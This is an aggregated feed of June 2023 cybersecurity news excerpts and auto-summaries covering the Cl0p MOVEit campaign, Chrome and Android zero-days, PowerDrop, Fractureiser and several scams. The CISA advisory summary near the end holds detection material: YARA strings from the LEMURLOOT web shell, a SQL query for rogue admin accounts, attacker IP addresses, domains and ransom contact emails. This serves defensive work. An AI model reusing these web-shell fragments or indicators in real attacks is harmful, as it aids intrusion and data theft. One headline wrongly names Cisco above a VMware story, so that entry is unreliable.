                The U.S. Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) have published a joint advisory regarding the active exploitation of a recently disclosed critical flaw in Progress Software's MOVEit Transfer application to drop ransomware. "The Cl0p Ransomware Gang, also known as TA505, reportedly began exploiting a previously unknown SQL injection [...]"

                Autosummary: "Several of these hosts are associated with high-profile organizations, including multiple Fortune 500 companies and both state and federal government agencies," Censys noted, highlighting finance, technology, and healthcare as the sectors with the most exposures.


                Malware menaces Minecraft mods

                exploits
                2023-06-08 https://www.tripwire.com/state-of-security/malware-menaces-minecraft-mods
                If you, or your kids, are fans of Minecraft, you might be wise not to download any new mods or plugins for a while. Read more in my article on the Tripwire State of Security blog.


                Clop ransomware likely testing MOVEit zero-day since 2021

                exploits ransomware
                2023-06-08 https://www.bleepingcomputer.com/news/security/clop-ransomware-likely-testing-moveit-zero-day-since-2021/
                The Clop ransomware gang has been looking for ways to exploit a now-patched zero-day in the MOVEit Transfer managed file transfer (MFT) solution since 2021, according to Kroll security experts. [...]

                Autosummary: [Image: Clop collecting victim info in April 2022, source Kroll] "Kroll observed activity consistent with MOVEit Transfer exploitation that collectively occurred on April 27, 2022; May 15–16, 2023; and May 22, 2023, indicating that actors were testing access to organizations via likely automated means and pulling back information from the MOVEit Transfer servers to identify which organization they were accessing," the report reveals.


                PoC released for Windows Win32k bug exploited in attacks

                exploits
                2023-06-08 https://www.bleepingcomputer.com/news/security/poc-released-for-windows-win32k-bug-exploited-in-attacks/
                Researchers have released a proof-of-concept (PoC) exploit for an actively exploited Windows local privilege escalation vulnerability fixed as part of the May 2023 Patch Tuesday. [...]

                Autosummary: Re-discovering the flaw: while the vulnerability is actively exploited, Microsoft says it only affects older versions of Windows, including older Windows 10 versions, Windows Server, and Windows 8, and does not affect Windows 11.


                Researchers published PoC exploit code for actively exploited Windows elevation of privilege issue

                exploits
                2023-06-08 https://securityaffairs.com/147245/hacking/windows-cve-2023-29336-poc.html

                Researchers published an exploit for an actively exploited Microsoft Windows vulnerability tracked as CVE-2023-29336. The Microsoft Windows vulnerability CVE-2023-29336 (CVSS score 7.8) is an elevation of privilege issue that resides in the Win32k component. Win32k.sys is a system driver file in the Windows operating system. The driver is responsible for providing the interface between user-mode applications and […]

                The post Researchers published PoC exploit code for actively exploited Windows elevation of privilege issue appeared first on Security Affairs.

                "

                Autosummary: Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Kimsuky) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "


                Warning: Victims" faces placed on explicit images in sextortion scam

                financial
                2023-06-08 https://www.malwarebytes.com/blog/news/2023/06/warning-victims-faces-placed-on-explicit-images-in-sextortion-scam

                Categories: Personal
                Tags: sextortion, deepfake, FBI, blackmail, extortion, fake, fakes, synthetic

                We take a look at some new developments in sextortion cases via a warning issued by the FBI.

                The post Warning: Victims' faces placed on explicit images in sextortion scam appeared first on Malwarebytes Labs.

                Autosummary: Here’s how the FBI describes sextortion: Sextortion, which may violate several federal criminal statutes, involves coercing victims into providing sexually explicit photos or videos of themselves, then threatening to share them publicly or with the victim's family and friends. The more traditional form of sextortion is where a fraudster convinces the person they’re speaking to that they’re interested in romance, obtains revealing images of the victim, and then uses those images for blackmail. From the release: The FBI continues to receive reports from victims, including minor children and non-consenting adults, whose photos or videos were altered into explicit content.


                Update Chrome now! Google patches actively exploited zero-day

                exploits
                2023-06-08 https://www.malwarebytes.com/blog/news/2023/06/update-chrome-now-google-patches-actively-exploited-zero-day

                Categories: Exploits and vulnerabilities

                Categories: News

                Tags: Google

                Tags: Chrome

                Tags: V8

                Tags: heap corruption

                Tags: type confusion

                Tags: CVE-2023-3079

                Google has released a Chrome update for a zero-day for which an exploit is actively being used in the wild.

                (Read more...)

                The post Update Chrome now! Google patches actively exploited zero-day appeared first on Malwarebytes Labs.

                "

                Autosummary: How to protect yourself If you’re a Chrome user on Windows, Mac, or Linux, you should update as soon as possible. Users of other Chromium based browsers, like Edge, should be on the lookout for updates as well, as this one is likely to affect all Chromium based browsers. "


                Embracing realistic simulations in cybersecurity training programs

                ciber
                2023-06-07 https://www.helpnetsecurity.com/2023/06/07/embracing-realistic-simulations-cybersecurity-training-programs-video/

                In this Help Net Security video, Ed Adams, CEO of Security Innovation, discusses the shifts in cybersecurity training. 60% of companies now include realistic simulations in their cybersecurity training programs compared to 36% in 2020. According to Security Innovation research, organizations increasingly embrace realistic simulations in training programs. Respondents ranked this feature as highly effective and delivering the most significant ROI compared with other cybersecurity training program components.

                The post Embracing realistic simulations in cybersecurity training programs appeared first on Help Net Security.

                "

                Autosummary: "


                New PowerDrop Malware Targeting U.S. Aerospace Industry

                exploits industry
                2023-06-07 https://thehackernews.com/2023/06/new-powerdrop-malware-targeting-us.html
                An unknown threat actor has been observed targeting the U.S. aerospace industry with a new PowerShell-based malware called PowerDrop. "PowerDrop uses advanced techniques to evade detection such as deception, encoding, and encryption," according to Adlumin, which found the malware implanted in an unnamed domestic aerospace defense contractor in May 2023. "The name is derived from the tool, "

                Autosummary: "


                Exploited zero-day patched in Chrome (CVE-2023-3079)

                exploits
                2023-06-07 https://www.helpnetsecurity.com/2023/06/07/cve-2023-3079/

                Google has fixed a high-severity vulnerability in the Chrome browser (CVE-2023-3079) that is being exploited by attackers. About the vulnerability CVE-2023-3079 is a vulnerability that stems from a type confusion in the V8 JavaScript engine, and has been uncovered by Clément Lecigne of Google’s Threat Analysis Group (TAG), a “task-force” dedicated to protecting users from state-sponsored malware attacks and other advanced persistent threats. “Google is aware that an exploit for CVE-2023-3079 exists in the wild,” … More

                The post Exploited zero-day patched in Chrome (CVE-2023-3079) appeared first on Help Net Security.

                "

                Autosummary: "


                Winning the Mind Game: The Role of the Ransomware Negotiator

                exploits ransomware
                2023-06-07 https://thehackernews.com/2023/06/winning-mind-game-role-of-ransomware.html
                Get exclusive insights from a real ransomware negotiator who shares authentic stories from network hostage situations and how he managed them. The Ransomware Industry Ransomware is an industry. As such, it has its own business logic: organizations pay money, in crypto-currency, in order to regain control over their systems and data. This industry's landscape is made up of approximately 10-20 "

                Autosummary: Includes understanding what was compromised, how deep the attackers are in the system, whether the act is a single, double or triple ransomware, if the attack was financially motivated or if it was a political or personal attack, etc. A few months later, the FBI reported they had attacked prominent ransomware group REvil: The attack garnered a response from the Conti group, which reflected their ideological motives: Ransomware Vaccinations Managing a ransomware event is similar to managing a hostage situation. The technological track includes forensic, investigation, containment, remediation and recovery, as well as professional dialogue. For example, how deep the attackers are in the system, how much data was exfiltrated, etc. The business track covers business continuity plans and media and PR. "


                New PowerDrop malware targets U.S. aerospace defense industry

                exploits industry
                2023-06-07 https://securityaffairs.com/147168/apt/powerdrop-targets-aerospace.html

                A previously unknown threat actor has been observed targeting the U.S. aerospace defense sector with a new PowerShell malware dubbed PowerDrop. Researchers from the Adlumin Threat Research discovered a new malicious PowerShell script, dubbed PowerDrop, that was employed in attacks aimed at organizations in the U.S. aerospace sector. The PowerShell-based malware uses advanced techniques to […]

                The post New PowerDrop malware targets U.S. aerospace defense industry appeared first on Security Affairs.

                "

                Autosummary: “It highlights the importance of having dedicated 24/7 cybersecurity teams within any operational landscape,” "


                Cisco fixes critical vulnerability in vRealize network analytics tool

                exploits industry
                2023-06-07 https://www.bleepingcomputer.com/news/security/cisco-fixes-critical-vulnerability-in-vrealize-network-analytics-tool/
                VMware issued multiple security patches today to address critical and high-severity vulnerabilities in VMware Aria Operations for Networks, allowing attackers to gain remote execution or access sensitive information. [...] "

                Autosummary: "


                EC-Council’s Certified CISO Hall of Fame Report 2023 shows Cloud Security as Top Concern

                government
                2023-06-07 https://www.bleepingcomputer.com/news/security/ec-councils-certified-ciso-hall-of-fame-report-2023-shows-cloud-security-as-top-concern/
                A survey of global cybersecurity leaders through the 2023 Certified CISO Hall of Fame Report commissioned by EC-Council identified 4 primary areas of grave concern: cloud security, data security, security governance, and lack of cybersecurity talent. [...] "

                Autosummary: Additional challenges identified in the report include third-party/vendor security management, network security, application security, endpoint security, rapid IT changes, business growth and expansion of hybrid work models, and an inadequate focus on cyber risk management. A truly global organization with a driving belief in bringing diversity, equity and inclusion to the modern cybersecurity workforce, EC-Council maintains 11 offices in the U.S., the UK, India, Malaysia, Singapore, and Indonesia. "


                0mega ransomware gang changes tactics

                exploits ransomware industry
                2023-06-07 https://www.helpnetsecurity.com/2023/06/07/0mega-ransomware-gang-changes-tactics/

                A number of ransomware gangs have stopped using malware to encrypt targets’ files and have switched to a data theft/extortion approach to get paid; 0mega – a low-profile and seemingly not very active threat actor – seems to be among them. About the 0mega ransomware operation 0mega (spelled with a zero) is a relative newcomer to the ransomware/extortion business. Evidence of its activities were first spotted roughly a year ago, when one victim – a … More

                The post 0mega ransomware gang changes tactics appeared first on Help Net Security.

                "

                Autosummary: The attackers first compromised one of the company’s Microsoft Global admin service accounts that did not have multi-factor authentication enabled, then used it to create a new Microsoft AD user called 0mega and added various permissions to it (Global Administrator, SharePoint Administrator, Exchange Administrator, Teams Administrator). "


                SAIC Trust Resilience boosts zero trust strategy plans for government agencies

                government
                2023-06-07 https://www.helpnetsecurity.com/2023/06/07/saic-trust-resilience/

                SAIC launched Trust Resilience, a holistic approach to support government agencies adopting the mandated zero trust architecture. “Trust Resilience builds security into IT modernization, delivering protection and compliance of mission-critical resources no matter where organizations are on their technology modernization journey,” said Shawn Kingsberry, VP, Cyber Solutions at SAIC. “It also delivers well-defined metrics while aligning to all major federal government cybersecurity executive orders and the White House 2023 National Cybersecurity Strategy.” SAIC’s offering enables … More

                The post SAIC Trust Resilience boosts zero trust strategy plans for government agencies appeared first on Help Net Security.

                "

                Autosummary: “Despite the hype surrounding Zero Trust, Government agencies are telling IDC they continue to struggle in prioritizing security modernization efforts outlined in Executive Order 14028,” said Aaron Walker, IDC Government Insights research manager, Government Trust, Security and Resiliency Strategies. "


                Immersive Labs and Accenture join forces to address the cybersecurity talent deficit

                ciber
                2023-06-07 https://www.helpnetsecurity.com/2023/06/07/immersive-labs-accenture/

                Immersive Labs and Accenture are working together to launch the Cyber Million program that aims to solve the cybersecurity talent deficit by increasing access to one million entry-level cybersecurity operations jobs over the next decade. The beta version of the program will be powered by the Immersive Labs platform with Accenture Security serving as the first foundational partner. The program is now available to other organizations seeking to make cybersecurity operations roles available on the … More

                The post Immersive Labs and Accenture join forces to address the cybersecurity talent deficit appeared first on Help Net Security.

                "

                Autosummary: “Cybersecurity talent is everywhere, and it can be developed if those eager to learn are given the opportunity, whether or not they come from a technical background,” said Robert Boyce, Global Lead of Cyber Resilience, Accenture. "


                June 2023 Security Update for Android fixed Arm Mali GPU bug used by spyware

                exploits
                2023-06-07 https://securityaffairs.com/147186/malware/june-2023-security-update-android-spyware.html

                June 2023 security update for Android released by Google fixes about fifty flaws, including an Arm Mali GPU bug exploited by surveillance firms in their spyware. The June 2023 Android Security Bulletin provides details about the fix for more than fifty vulnerabilities affecting Android devices. Security updates released this month also addressed a vulnerability, tracked […]

                The post June 2023 Security Update for Android fixed Arm Mali GPU bug used by spyware appeared first on Security Affairs.

                "

                Autosummary: "


                Mexico violence: Bodies found dumped in ravine are missing call centre workers

                latam
                2023-06-07 https://www.bbc.co.uk/news/world-latin-america-65832537?at_medium=RSS&at_campaign=KARANGA
                Dozens of bags containing human remains were found dumped in a ravine in Jalisco last week. "

                Autosummary: "


                Cisco fixes AnyConnect bug giving Windows SYSTEM privileges

                exploits
                2023-06-07 https://www.bleepingcomputer.com/news/security/cisco-fixes-anyconnect-bug-giving-windows-system-privileges/
                Cisco has fixed a high-severity vulnerability found in Cisco Secure Client (formerly AnyConnect Secure Mobility Client) software that can let attackers escalate privileges to the SYSTEM account used by the operating system. [...] "

                Autosummary: "


                New Fractureiser malware used CurseForge Minecraft mods to infect Windows, Linux

                exploits
                2023-06-07 https://www.bleepingcomputer.com/news/security/new-fractureiser-malware-used-curseforge-minecraft-mods-to-infect-windows-linux/
                Hackers used the popular Minecraft modding platforms Bukkit and CurseForge to distribute a new "Fractureiser" information-stealing malware through uploaded modifications and by injecting malicious code into existing projects. [...] "

                Autosummary: CurseForge: Dungeons Arise Sky Villages Better MC modpack series Fabulously Optimized (Found to not be compromised) Dungeonz Skyblock Core Vault Integrations AutoBroadcast Museum Curator Advanced Vault Integrations Bug fix Create Infernal Expansion Plus - Mod removed from CurseForge Bukkit: Display Entity Editor HavenElytra The Nexus Event Custom Entity Editor Simple Harvesting MCBounties Easy Custom Foods Anti Command Spam Bungeecord Support Ultimate Leveling Anti Redstone Crash Hydration Fragment Permission Plugin No VPNS Ultimate Titles Animations Gradient RGB Floating Damage Affected players include those who downloaded mods or plugins from CurseForge and dev.bukkit.org in the past three weeks, but the extent of the infection is yet to be fully appreciated. "


                VMware fixes critical vulnerability in vRealize network analytics tool

                exploits industry
                2023-06-07 https://www.bleepingcomputer.com/news/security/vmware-fixes-critical-vulnerability-in-vrealize-network-analytics-tool/
                VMware issued multiple security patches today to address critical and high-severity vulnerabilities in VMware Aria Operations for Networks, allowing attackers to gain remote execution or access sensitive information. [...] "

                Autosummary: "


                Clop ransomware gang claims the hack of hundreds of victims exploiting MOVEit Transfer bug

                exploits ransomware
                2023-06-07 https://securityaffairs.com/147195/cyber-crime/clop-ransomware-moveit-transfer-attacks.html

                Clop ransomware group claims to have hacked hundreds of companies globally by exploiting MOVEit Transfer vulnerability. The Clop ransomware group may have compromised hundreds of companies worldwide by exploiting a vulnerability in MOVEit Transfer software. MOVEit Transfer is a managed file transfer that is used by enterprises to securely transfer files using SFTP, SCP, and […]

                The post Clop ransomware gang claims the hack of hundreds of victims exploiting MOVEit Transfer bug appeared first on Security Affairs.

                "

                Autosummary: "


                VMware fixes critical vulnerabilities in vRealize network analytics tool

                industry
                2023-06-07 https://www.bleepingcomputer.com/news/security/vmware-fixes-critical-vulnerabilities-in-vrealize-network-analytics-tool/
                VMware issued multiple security patches today to address critical and high-severity vulnerabilities in VMware Aria Operations for Networks, allowing attackers to gain remote execution or access sensitive information. [...] "

                Autosummary: "


                Facebook clickbait leads to money scam for users

                financial
                2023-06-07 https://www.malwarebytes.com/blog/threat-intelligence/2023/06/thousands-of-malicious-google-cloud-run-instances-deployed-to-scam-facebook-users

                Categories: Threat Intelligence

                Tags: facebook

                Tags: posts

                Tags: google

                Tags: cloud run

                Clickbait posts on Facebook can lead to malicious websites. In this campaign, crooks are redirecting Facebook victims to scam pages hosted on Google's infrastructure.

                (Read more...)

                The post Facebook clickbait leads to money scam for users appeared first on Malwarebytes Labs.

                "

                Autosummary: Indicators of Compromise Cloaking domains trendingentertainers[.]com trendingfilmreviews[.]com trendingshowbiz[.]com trendingtvshows[.]com usunveiled[.]net viralcelebrityzone[.]com viralfamezone[.]com virallaughtrack[.]com viralstargossip[.]com viralfunnylaugh[.]com Cloaking hosting 194.38.23[.]88 194.38.23[.]18 194.38.23[.]58 194.38.23[.]30 Google Cloud Run URLs (partial list here). Now, if you happen to click on a Facebook post as a real human (not a bot or using a VPN), you will get something entirely different, as the cloaking domains will perform a 302 redirect. "


                Smashing Security podcast #325: Rick Astley and the little birdie scam

                financial
                2023-06-07 https://grahamcluley.com/smashing-security-podcast-325/
                Australia's signal intelligence agency calls upon an Eighties popstar to fight terrorism, and a simple act of kindness leads to a woman being scammed for thousands. All this and much more is discussed in the latest edition of the "Smashing Security" podcast by cybersecurity veterans Graham Cluley and Carole Theriault. Plus don't miss our featured interview with Max Power of Bitwarden. "

                Autosummary: Hosts: Graham Cluley – @gcluley Carole Theriault – @caroletheriault Episode links: Sponsored by: Bitwarden – Password security you can trust. "


                Chinese PostalFurious Gang Strikes UAE Users with Sneaky SMS Phishing Scheme

                financial
                2023-06-06 https://thehackernews.com/2023/06/chinese-postalfurious-gang-strikes-uae.html
                A Chinese-speaking phishing gang dubbed PostalFurious has been linked to a new SMS campaign that's targeting users in the U.A.E. by masquerading as postal services and toll operators, per Group-IB. The fraudulent scheme entails sending users bogus text messages asking them to pay a vehicle trip fee to avoid additional fines. The messages also contain a shortened URL to conceal the actual "

                Autosummary: "The URLs from the texts lead to fake branded payment pages that ask for personal details, such as name, address, and credit card information," Group-IB said. "


                British Airways, BBC and Boots were impacted by the Zellis data breach

                financial
                2023-06-06 https://securityaffairs.com/147119/data-breach/zellis-data-breach-bbc-ba.html

                The BBC and British Airways were both impacted by the data breach suffered by the payroll provider Zellis. As a result of the cyber attack on the payroll provider Zellis, the personal data of employees at the BBC and British Airways has been compromised and exposed. “Zellis, a payroll company based in the UK, is […]

                The post British Airways, BBC and Boots were impacted by the Zellis data breach appeared first on Security Affairs.

                "

                Autosummary: “Zellis, a payroll company based in the UK, is understood to have been impacted by a cyber security attack targeting file transfer company MOVEit, with British Airways among the firms impacted” reported The Mirror. "


                Academics, media, and think tanks warned of North Korean hacking campaign

                industry
                2023-06-06 https://www.bitdefender.com/blog/hotforsecurity/academics-media-and-think-tanks-warned-of-north-korean-hacking-campaign/
                North Korean state-sponsored hackers are targeting think tanks, research centres, media organisations, and academics in the United States and South Korea to gather intelligence. Read more in my article on the Hot for Security blog. "

                Autosummary: This initial contact may present itself as an attempt to solicit response to an inquiry related to foreign policy, conduct a survey, request an interview, ask the recipient for a resume or to review a document, or offer payment for authoring a research paper. "


                Zero-Day Alert: Google Issues Patch for New Chrome Vulnerability - Update Now!

                exploits
                2023-06-06 https://thehackernews.com/2023/06/zero-day-alert-google-issues-patch-for.html
                Google on Monday released security updates to patch a high-severity flaw in its Chrome web browser that it said is being actively exploited in the wild. Tracked as CVE-2023-3079, the vulnerability has been described as a type confusion bug in the V8 JavaScript engine. Clement Lecigne of Google's Threat Analysis Group (TAG) has been credited with reporting the issue on June 1, 2023. "Type "

                Autosummary: "


                Cyclops Ransomware Gang Offers Go-Based Info Stealer to Cybercriminals

                exploits ransomware ciber
                2023-06-06 https://thehackernews.com/2023/06/cyclops-ransomware-gang-offers-go-based.html
                Threat actors associated with the Cyclops ransomware have been observed offering an information stealer malware that's designed to capture sensitive data from infected hosts. "The threat actor behind this [ransomware-as-a-service] promotes its offering on forums," Uptycs said in a new report. "There it requests a share of profits from those engaging in malicious activities using its malware." "

                Autosummary: "


                Cyclops Ransomware group offers a multiplatform Info Stealer

                exploits ransomware
                2023-06-06 https://securityaffairs.com/147127/cyber-crime/cyclops-ransomware-gang-info-stealer.html

                Researchers from security firm Uptycs reported that threat actors linked to the Cyclops ransomware are offering a Go-based information stealer. The Cyclops group has developed multi-platform ransomware that can infect Windows, Linux, and macOS systems. In an unprecedented move, the group is also offering a separate information-stealer malware that can be used to steal sensitive data from infected […]

                The post Cyclops Ransomware group offers a multiplatform Info Stealer appeared first on Security Affairs.

                "

                Autosummary: "


                Google fixes new Chrome zero-day flaw with exploit in the wild

                exploits
                2023-06-06 https://www.bleepingcomputer.com/news/security/google-fixes-new-chrome-zero-day-flaw-with-exploit-in-the-wild/
                Google has released a security update for Chrome web browser to address the third zero-day vulnerability that hackers exploited this year. [...] "

                Autosummary: We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven't yet fixed" - Google CVE-2023-3079 has been assessed to be a high-severity issue and it was discovered by Google's researcher Clément Lecigne on June 1, 2023, and is a type confusion in V8, Chrome's JavaScript engine tasked with executing code within the browser. "


                Verizon 2023 Data Breach Investigations Report: 74% of breaches involve human element

                financial
                2023-06-06 https://www.helpnetsecurity.com/2023/06/06/verizon-data-breach-investigations-report-2023-dbir/

                Verizon Business today released the results of its 16th annual Data Breach Investigations Report (2023 DBIR), which analyzed 16,312 security incidents and 5,199 breaches. Chief among its findings is the soaring cost of ransomware – malicious software (malware) that encrypts an organization’s data and extorts large sums of money to restore access. Cost per ransomware rises The median cost per ransomware more than doubled over the past two years to $26,000, with 95% of incidents … More

                The post Verizon 2023 Data Breach Investigations Report: 74% of breaches involve human element appeared first on Help Net Security.

                "

                Autosummary: BEC on the rise Like ransomware, social engineering is a lucrative tactic for cybercriminals, especially given the rise of those techniques being used to impersonate enterprise employees for financial gain, an attack known as Business Email Compromise (BEC). "


                Google fixed the third Chrome zero-day of 2023

                exploits
                2023-06-06 https://securityaffairs.com/147137/hacking/chrome-zero-day-3.html

                Google released security updates to address a high-severity zero-day flaw in the Chrome web browser that is actively exploited in the wild. Google released security updates to address a high-severity vulnerability, tracked as CVE-2023-3079, in its Chrome web browser. The vulnerability is a type confusion issue that resides in the V8 JavaScript engine. The IT […]

                The post Google fixed the third Chrome zero-day of 2023 appeared first on Security Affairs.

                "

                Autosummary: "


                Android security update fixes Mali GPU flaw exploited by spyware

                exploits
                2023-06-06 https://www.bleepingcomputer.com/news/security/android-security-update-fixes-mali-gpu-flaw-exploited-by-spyware/
                Google has released the monthly security update for the Android platform, adding fixes for 56 vulnerabilities, five of them with a critical severity rating and one exploited since at least last December. [...] "

                Autosummary: The new security patch level 2023-06-05 integrates a patch for CVE-2022-22706, a high-severity flaw in the Mali GPU kernel driver from Arm that Google’s Threat Analysis Group (TAG) believes it may have been used in a spyware campaign targeting Samsung phones. "


                New "PowerDrop" PowerShell malware targets U.S. aerospace industry

                exploits industry
                2023-06-06 https://www.bleepingcomputer.com/news/security/new-powerdrop-powershell-malware-targets-us-aerospace-industry/
                A new PowerShell malware script named "PowerDrop" has been discovered to be used in attacks targeting the U.S. aerospace defense industry. [...] "

                Autosummary: Executing the decrypted command (Adlumin) Next, PowerDrop sends the results of the command execution back to the C2 server, and if they are too large, it splits them into 128-byte chunks transmitted in a stream of multiple messages. "


                New Malware Campaign Leveraging Satacom Downloader to Steal Cryptocurrency

                exploits
                2023-06-06 https://thehackernews.com/2023/06/new-malware-campaign-leveraging-satacom.html
                A recent malware campaign has been found to leverage Satacom downloader as a conduit to deploy stealthy malware capable of siphoning cryptocurrency using a rogue extension for Chromium-based browsers. "The main purpose of the malware that is dropped by the Satacom downloader is to steal BTC from the victim's account by performing web injections into targeted cryptocurrency websites," Kaspersky "

                Autosummary: Targets of the campaign include Coinbase, Bybit, KuCoin, Huobi, and Binance users primarily located in Brazil, Algeria, Turkey, Vietnam, Indonesia, India, Egypt, and Mexico. "


                Cl0p ransomware gang claims first victims of the MOVEit vulnerability

                exploits ransomware
                2023-06-06 https://www.malwarebytes.com/blog/news/2023/06/cl0p-ransomware-gang-claims-first-victims-of-the-moveit-vulnerability

                Categories: Exploits and vulnerabilities

                Categories: News

                Categories: Ransomware

                Tags: Progress

                Tags: MOVEit

                Tags: Transfer

                Tags: CVE-2023-34362

                Tags: BBC

                Tags: Zellis

                Tags: BA

                The first victims of the ongoing attacks on vulnerable MOVEit Transfer instances are coming forward. The Cl0p ransomware gang claims it is behind the attacks.

                (Read more...)

                The post Cl0p ransomware gang claims first victims of the MOVEit vulnerability appeared first on Malwarebytes Labs.

                "

                Autosummary: In Progress MOVEit Transfer before 2021.0.6 (13.0.6), 2021.1.4 (13.1.4), 2022.0.4 (14.0.4), 2022.1.5 (14.1.5), and 2023.0.1 (15.0.1), a SQL injection vulnerability has been found in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain access to MOVEit Transfer's database. Depending on the database engine being used (MySQL, Microsoft SQL Server, or Azure SQL), an attacker may be able to infer information about the structure and contents of the database, and execute SQL statements that alter or delete database elements. MOVEit and blocks five malicious IP addresses—138.197.152.201, 209.97.137.33, 5.252.191.0/24, 148.113.152.144, 89.39.105.108—that were found to be looking for vulnerable systems. "


                Android security update fixes Mali GPU bug exploited as zero-day

                exploits
                2023-06-06 https://www.bleepingcomputer.com/news/security/android-security-update-fixes-mali-gpu-bug-exploited-as-zero-day/
                Google has released the monthly security update for the Android platform, adding fixes for 56 vulnerabilities, five of them with a critical severity rating and one exploited since at least last December. [...] "

                Autosummary: The new security patch level 2023-06-05 integrates a patch for CVE-2022-22706, a high-severity flaw in the Mali GPU kernel driver from Arm that Google’s Threat Analysis Group (TAG) believes it may have been used in a spyware campaign targeting Samsung phones. "


                #StopRansomware: CL0P Ransomware Gang Exploits CVE-2023-34362 MOVEit Vulnerability

                exploits ransomware
                2023-06-06 https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-158a

                SUMMARY

                Note: this joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

                Actions to take today to mitigate cyber threats from CL0P ransomware: 

                • Take an inventory of assets and data, identifying authorized and unauthorized devices and software.
                • Grant admin privileges and access only when necessary, establishing a software allow list that only executes legitimate applications.
                • Monitor network ports, protocols, and services, activating security configurations on network infrastructure devices such as firewalls and routers.
                • Regularly patch and update software and applications to their latest versions, and conduct regular vulnerability assessments.

                The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint CSA to disseminate known CL0P ransomware IOCs and TTPs identified through FBI investigations as recently as June 2023.

                According to open source information, beginning on May 27, 2023, CL0P Ransomware Gang, also known as TA505, began exploiting a previously unknown SQL injection vulnerability (CVE-2023-34362) in Progress Software’s managed file transfer (MFT) solution known as MOVEit Transfer. Internet-facing MOVEit Transfer web applications were infected with a web shell named LEMURLOOT, which was then used to steal data from underlying MOVEit Transfer databases. In similar spates of activity, TA505 conduct "

                Autosummary: This MOVEit Transfer critical vulnerability exploit impacts the following versions of the software [2]: MOVEit Transfer 2023.0.0, 2022.1.x, 2022.0.x, 2021.1.x, 2021.0.x, 2020.1.x and 2020.0.x. Due to the speed and ease with which TA505 has exploited this vulnerability, and based on their past campaigns, FBI and CISA expect to see widespread exploitation of unpatched software services in both private and public networks. In late January 2023, the CL0P ransomware group launched a campaign using a zero-day vulnerability, now catalogued as CVE-2023-0669, to target the GoAnywhere MFT platform.

                TA505 has operated a RaaS and has acted as an affiliate of other RaaS operations; as an initial access broker (IAB), selling access to compromised corporate networks; as a customer of other IABs; and as a large botnet operator specializing in financial fraud and phishing attacks. CL0P’s toolkit contains several malware types to collect information, including the FlawedAmmyy/FlawedGrace remote access trojan (RAT), which collects information and attempts to communicate with the command and control (C2) server to enable the download of additional malware components [T1071], [T1105]. The advisory quotes the actors’ own contact instructions: “You can contact us using the following contact information: unlock@rsv-box[.]com and unlock@support-mult[.]com”.

                The web shell authenticates incoming HTTP requests via a hard-coded password and can run commands that will download files from the MOVEit Transfer system, extract its Azure system settings, retrieve detailed record information, and create, insert, or delete a particular user. Table 1, ATT&CK Techniques for Enterprise, Initial Access: Exploit Public-Facing Application (T1190): CL0P ransomware group exploited the zero-day vulnerability CVE-2023-34362 affecting MOVEit Transfer software; the intrusion begins with a SQL injection to infiltrate the MOVEit Transfer web application.

                For detection, the advisory provides a SQL query for reviewing active, non-deleted accounts with Permission=30 in the MOVEit Transfer database: SELECT * FROM [<database name>].[dbo].[users] WHERE Permission=30 AND Status='active' and Deleted='0'. It also includes YARA rules, among them MOVEit_Transfer_exploit_webshell_aspx (date 2023-06-01; description “Detects indicators of compromise in MOVEit Transfer exploitation.”; verdict “dangerous”; MITRE T1505.003; platform Windows; search context filesystem; references https://www.bleepingcomputer.com/news/security/new-moveit-transfer-zero-day-mass-exploited-in-data-theft-attacks/ and https://gist.github.com/JohnHammond/44ce8556f798b7f6a7574148b679c643), whose strings include "human2.aspx", "Delete FROM users WHERE RealName='Health Check Service'", "Headers[\"X-siLock-Comment\"]", "set[\"Username\"]", "INSERT INTO users (Username, LoginName, InstID, Permission, RealName" and "MOVEit.DMZ". The advisory further lists malicious email domains, a code-signing certificate (Savas Investments PTY LTD, status Valid, issuer Sectigo Public Code Signing CA R36, valid 10/7/2022 - 10/7/2023) and campaign infrastructure IP addresses for the MOVEit (May/June 2023) and GoAnywhere (January/February 2023) campaigns.

                In addition, the authoring authorities of this CSA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques and to reduce the impact and risk of compromise by ransomware or data extortion actors: implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud); require all accounts with password logins (e.g., service account, admin accounts, and domain admin accounts) to comply with National Institute for Standards and Technology (NIST) standards for developing and managing password policies.

                REPORTING: The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with CL0P group actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA or the FBI.

                RESOURCES / REFERENCES: [1] Zero-Day Vulnerability in MOVEit Transfer Exploited for Data Theft | Mandiant; [2] MOVEit Transfer Critical Vulnerability (May 2023) - Progress Community; [3] MOVEit Transfer Critical Vulnerability CVE-2023-34362 Rapid Response (huntress.com). "


                Virtual claims raise alarms among insurance carriers and customers

                Telcos
                2023-06-05 https://www.helpnetsecurity.com/2023/06/05/insurance-identity-related-fraud/

                As the digital revolution changes the claims process, both carriers and customers are increasingly concerned about data privacy, according to LexisNexis Risk Solutions. More than 60% of consumers have concerns over the security of their personally identifiable information when they submit virtual claims. Carriers, meanwhile, are worried about the actual cost of fraud, which can be four times the value of the fraudulent transaction and can impact a carrier’s reputation. “Virtual or self-service claims have been … More

                The post Virtual claims raise alarms among insurance carriers and customers appeared first on Help Net Security.

                "

                Autosummary: Leaders are adopting a proactive, multi-layered approach that can include verifying PII, such as name, address and date of birth; using multi-factor or knowledge-based authentication methods, such as one-time passwords, multi-factor authentication or quizzes; using real-time digital risk signals, such as device and email intelligence, behavioral biometrics, link analysis or risk scoring; and using native device biometrics, consortium-based fraud scores or continuous monitoring. "


